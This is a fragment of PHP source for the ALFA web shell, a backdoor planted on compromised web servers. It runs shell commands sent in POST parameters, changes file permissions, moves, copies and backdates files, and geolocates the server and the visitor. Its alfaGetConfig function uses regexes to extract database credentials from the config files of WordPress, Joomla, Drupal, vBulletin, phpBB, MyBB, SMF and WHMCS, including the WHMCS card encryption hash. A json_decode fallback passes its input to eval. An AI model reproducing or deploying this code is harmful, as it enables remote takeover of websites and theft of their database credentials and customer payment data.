"; return $content; } if (!function_exists('json_encode')) { function json_encode($a = false) { if (is_null($a)) { return 'null'; } if ($a === false) { return 'false'; } if ($a === true) { return 'true'; } if (is_scalar($a)) { if (is_float($a)) { return floatval(str_replace(",", ".", strval($a))); } if (is_string($a)) { static $jsonReplaces = array(array("\\", "/", "\n", "\t", "\r", "\b", "\f", '"'), array('\\\\', '\\/', '\\n', '\\t', '\\r', '\\b', '\\f', '\"')); return '"' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . '"'; } else { return $a; } } $isList = true; for ($i = 0, reset($a); $i < count($a); $i++, next($a)) { if (key($a) !== $i) { $isList = false; break; } } $result = array(); if ($isList) { foreach ($a as $v) { $result[] = json_encode($v); } return '[' . join(',', $result) . ']'; } else { foreach ($a as $k => $v) { $result[] = json_encode($k).':'.json_encode($v); } return '{' . join(',', $result) . '}'; } } } if (!function_exists('json_decode')) { function json_decode($json, $array = true) { $comment = false; $out = '$x='; for ($i = 0; $i < strlen($json); $i++) { if (!$comment) { if ($json[$i] == '{' || $json[$i] == '[') { $out .= ' array('; } elseif ($json[$i] == '}' || $json[$i] == ']') { $out .= ')'; } elseif ($json[$i] == ':') { $out .= '=>'; } else { $out .= $json[$i]; } } else { $out .= $json[$i]; } if ($json[$i] == '"') { $comment = !$comment; } } eval($out . ';'); return $x; } } function alfaterminalExec() { $pwd = "pwd"; $seperator = ";"; if ($GLOBALS['sys'] != 'unix') { $pwd = "cd"; $seperator = "&"; } if ($GLOBALS["glob_chdir_false"] && !empty($_POST["c"])) { $cmd = "cd '".addslashes($_POST["c"])."'".$seperator; } $current_path = ''; if (preg_match("/cd[ ]{0,}(.*)[ ]{0,}".$seperator."|cd[ ]{0,}(.*)[ ]{0,}/i", $_POST['alfa1'], $match)) { if (empty($match[1])) { $match[1] = $match[2]; } $current_path = alfaEx("cd ".addslashes($match[1]).$seperator.$pwd); $current_path = str_replace("\\", "/", $current_path); } $out = alfaEx($cmd.$_POST['alfa1'], true); $out = htmlspecialchars($out); echo json_encode(array("output" => convertBash($out), "path" => $current_path)); } function convertBash($code) { $dictionary = array( '[01;30m' => '', '[01;31m' => '', '[01;32m' => '', '[01;33m' => '', '[01;34m' => '', '[01;35m' => '', '[01;36m' => '', '[01;37m' => '', '[0m' => '' ); $htmlString = str_replace(array_keys($dictionary), $dictionary, $code); return $htmlString; } function alfadoActions() { $chdir_fals = false; if (!@chdir($_POST['c'])) { $chdir_fals = true; $alfa_canruncmd = _alfa_can_runCommand(true, true); } if (isset($_POST['alfa1'])) { $_POST['alfa1'] = rawurldecode($_POST['alfa1']); } if (isset($_POST['alfa2'])) { $_POST['alfa2'] = rawurldecode($_POST['alfa2']); } $action = $_POST["alfa3"]; if ($action == "permission") { $perms = 0; $perm = $_POST["alfa2"]; for ($i = strlen($perm) - 1;$i >= 0;--$i) { $perms += (int)$perm[$i] * pow(8, (strlen($perm) - $i - 1)); } if (@chmod($_POST['alfa1'], $perms)) { echo("done"); } else { echo("no"); } return; } if ($action == "rename" || $action == "move") { $alfa1_decoded = $_POST['alfa1']; if ($chdir_fals) { $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"]; } $_POST['alfa1'] = trim($_POST['alfa1']); $alfa1_escape = addslashes($_POST["alfa1"]); if ($_POST["alfa3"] == "rename") { $_POST['alfa2'] = basename($_POST['alfa2']); } if (!empty($_POST['alfa2'])) { $cmd_rename = false; if ($chdir_fals && $alfa_canruncmd) { if (_alfa_is_writable($_POST['alfa1'])) { $cmd_rename = true; $alfa1_escape = addslashes($alfa1_decoded); alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa2'])."'"); } } if (!file_exists($_POST['alfa2'])) { if (@rename($_POST['alfa1'], $_POST['alfa2']) || $cmd_rename) { echo "done"; } else { echo "no"; } } else { echo "no"; } } } elseif ($action == "copy") { if (is_dir($_POST["alfa1"])) { $dir = str_replace('//', '/', $_POST["alfa1"]); $dir = explode('/', $dir); if (empty($dir[count($dir) - 1])) { $name = $dir[count($dir) - 2]; } else { $name = $dir[count($dir) - 1]; } } else { $name = basename($_POST["alfa1"]); } $dir = dirname($_POST["alfa1"]); if ($dir == ".") { $dir = $_POST["c"]."/"; } if (is_file($_POST["alfa1"])) { @copy($_POST["alfa1"], $_POST["alfa2"]); echo("done"); } elseif (is_dir($_POST["alfa1"])) { if (!is_dir($_POST["alfa2"])) { mkdir($_POST["alfa2"], 0755, true); } copy_paste($dir, $name, $_POST["alfa2"] . "/"); echo("done"); } } elseif ($action == "modify") { if (!empty($_POST['alfa1'])) { $time = strtotime($_POST['alfa1']); if ($time) { $touched = false; if ($chdir_fals && $alfa_canruncmd) { alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa1']))."' '".addslashes($_POST['alfa2'])."'"); $touched = true; } if (!@touch($_POST['alfa2'], $time, $time) && !$touched) { echo 'no'; } else { echo 'ok'; } } else { echo 'badtime'; } } } } function alfaget_flags() { $flags = array(); if (function_exists("curl_version")) { $curl = new AlfaCURL(); $server_addr = (!@$_SERVER["SERVER_ADDR"] ? (function_exists("gethostbyname") ? @gethostbyname($_SERVER['SERVER_NAME']) : '????') : @$_SERVER["SERVER_ADDR"]); $flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr); $flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]); if (strpos($flag2, "geoplugin") != false) { $flag = json_decode($flag, true); $flag2 = json_decode($flag2, true); if (!empty($flag['geoplugin_countryCode'])) { $flags["server"]["name"] = $flag['geoplugin_countryName']; $flags["server"]["code"] = $flag['geoplugin_countryCode']; } if (!empty($flag2['geoplugin_countryCode'])) { $flags["client"]["name"] = $flag2['geoplugin_countryName']; $flags["client"]["code"] = $flag2['geoplugin_countryCode']; } } } echo json_encode($flags); } function alfaGetConfig() { $cms = $_POST['alfa1']; $path = trim($_POST['alfa2']); $config = array( 'wp' => array('file' => '/wp-config.php', 'host' => array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1), 'dbname' => array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_NAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1), 'dbuser' => array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USER(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1), 'dbpw' => array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1), 'prefix' => array("/table_prefix[ ]{0,}=[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,};/",1) ), 'drupal' => array('file' => '/config.php', 'host' => array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1), 'dbname' => array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_DATABASE(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1), 'dbuser' => array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USERNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1), 'dbpw' => array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1), 'prefix' => array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PREFIX(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1) ), 'drupal2' => array('file' => '/sites/default/settings.php', 'host' => array("/(?:'|\")host(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1), 'dbname' => array("/(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1), 'dbuser' => array("/(?:'|\")username(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1), 'dbpw' => array("/(?:'|\")password(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1), 'prefix' => array("/(?:'|\")prefix(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1) ), 'vb' => array('file' => '/includes/config.php', 'host' => array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")servername(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3), 'dbuser' => array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")username(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3), 'dbname' => array("/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")dbname(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3), 'dbpw' => array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3), 'prefix' => array("/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")tableprefix(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3) ), 'phpnuke' => array('file' => '/config.php', 'host' => array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3), 'dbname' => array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3), 'dbuser' => array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3), 'dbpw' => array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3), 'prefix' => array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3) ), 'smf' => array('file' => '/Settings.php', 'host' => array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbname' => array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbuser' => array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbpw' => array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'prefix' => array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3) ), 'whmcs' => array('file' => '/configuration.php', 'host' => array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbname' => array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbuser' => array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbpw' => array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'cc_encryption_hash' => array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3) ), 'joomla' => array('file' => '/configuration.php', 'host' => array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbname' => array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbuser' => array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbpw' => array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'prefix' => array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3) ), 'phpbb' => array('file' => '/config.php', 'host' => array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbname' => array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbuser' => array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbpw' => array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'prefix' => array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3) ), 'mybb' => array('file' => '/inc/config.php', 'host' => array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbname' => array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbuser' => array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'dbpw' => array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3), 'prefix' => array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3) ) ); if ($cms == "drupal") { $file = $config[$cms]['file']; $file = $path.$file; if (@is_file($file) || _alfa_is_dir($file, "-e")) { } else { $cms = 'drupal2'; } } if ($cms == "vb") { $file = $config[$cms]['file']; $file = $path.$file; if (@is_file($file) || _alfa_is_dir($file, "-e")) { } else { $path .= '/core'; } } $data = array(); $srch_host = $config[$cms]['host'][0]; $srch_user = $config[$cms]['dbuser'][0]; $srch_name = $config[$cms]['dbname'][0]; $srch_pw = $config[$cms]['dbpw'][0]; $prefix = $config[$cms]['prefix'][0]; $file = $config[$cms]['file']; $chost = $config[$cms]['host'][1]; $cuser = $config[$cms]['dbuser'][1]; $cname = $config[$cms]['dbname'][1]; $cpw = $config[$cms]['dbpw'][1]; $cprefix = $config[$cms]['prefix'][1]; if (@is_dir($path) || _alfa_is_dir($path)) { $file = $path.$file; } elseif (@is_file($path) || _alfa_is_dir($path, "-e")) { $file = $path; } else { return false; } $file = __read_file($file); if ($cms == "drupal2") { $file = preg_replace("/\@code(.*?)\@endcode/s", "", $file); } elseif ($cms == "vb") { $file = preg_replace("/right of the(.*?)BAD!/s", "", $file); } if (preg_match($srch_host, $file, $mach)) { $data['host'] = $mach[$chost]; } if (preg_match($srch_user, $file, $mach)) { $data['user'] = $mach[$cuser]; } if (preg_match($srch_name, $file, $mach)) { $data['dbname'] = $mach[$cname]; } if (preg_match($srch_pw, $file, $mach)) { $data['password'] = $mach[$cpw]; } if (isset($prefix)) { if (preg_match($prefix, $file, $mach)) { $data['prefix'] = $mach[$cprefix]; } } if ($cms == 'whmcs') { if (preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)) { $data['cc_encryption_hash'] = $mach[3]; } } echo json_encode($data); } if (empty($_POST['a'])) { if (isset($default_action) && function_exists('alfa' . $default_action)) { $_POST['a'] = $default_action; } else { $_POST['a'] = 'FilesMan2'; } }//'FilesMan'; if (!empty($_POST['a']) && function_exists('alfa' . $_POST['a'])) { call_user_func('alfa' . $_POST['a']); } exit; /* #Persian Gulf For Ever #skype : sole.sad #skype : ehsan.invisible */ ?>